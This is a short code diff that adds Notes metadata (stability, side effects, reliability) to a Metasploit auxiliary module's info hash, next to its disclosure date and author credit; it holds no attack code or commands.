@@ -37,7 +37,12 @@ class MetasploitModule < Msf::Auxiliary
         'h00die <mike@shorebreaksecurity.com>' # Metasploit enhancements/docs
       ],
       'License' => MSF_LICENSE,
-      'DisclosureDate' => 'Feb 11 2015'
+      'DisclosureDate' => 'Feb 11 2015',
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => []
+      }
     )
   end
 
